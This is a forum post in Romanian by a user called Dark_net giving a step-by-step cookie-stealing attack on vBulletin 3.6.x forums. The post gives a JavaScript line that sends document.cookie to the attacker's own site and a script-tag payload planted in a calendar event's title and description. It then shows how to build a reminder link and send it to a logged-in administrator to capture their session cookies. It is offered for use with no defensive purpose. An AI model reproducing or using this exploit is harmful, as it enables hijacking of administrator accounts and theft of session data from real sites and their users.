Jump to content
Dark_net

vBulletin Cookies Stealer 3.6.x

Recommended Posts

Posted

Vbulletin Stealing Admin's Cookies (step by step by Dark_net):

1) Creati un JS si scrieti:


location.href='http://[your_site]/?cookie.php?c='+(document.cookie)

2) Creati un file cookie.php <- un file php care captureaza i cookies si trasmite pe e-mailul vostru o salveaza in un file TXT, HTML, ecc

3) Cautati un Vbulletin cu CALENDAR (calendar.php <-by default)

si creati un nou event (Add New Event)

4) Unde este argomentul (Title) scrieti:


</title><SCRIPT SRC=http://www.[your_site]/[your_js].js></SCRIPT>

5) Si unde este 'Corpul mesajului' (descrierea) (in ingleza: Event Information) scrieti la fel:


</title><SCRIPT SRC=http://www.[your_site]/[your_js].js></SCRIPT>

6) Salvati! (Save Event in basso)

Cind vine salvat o sa vedeti un URL ca asta:


[target]/forum/calendar.php?do=getinfo&e=5&day=2007-7-21&c=1

Duceteva unde este URLul si modificati partea asta:


getinfo&e=5&day=2007-7-21&c=1

Cu:


addreminder&e=[ID] <- in acest exemplu ID-ul o sa fie: 5

7) Totul ii terminat!

Pe urma trebuie sa trimiteti Linkul la admin in acest mod:


[url]www.sito_della_vittima.com/forum/calendar.php?do=addreminder&e=[/url][ID_DELL'EVENTO]

Admin-ul trebuie sa fie pe forum cu Login efectuat!

Daca o sa se duca pe linkul la eventul cu XSS o sa aveti cookies de admin

ByeZ // Dark_net //

P.S. scuzati romana mea :S si cred ca pot sa-l postez si aicia , ii un exploit :) XSS

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...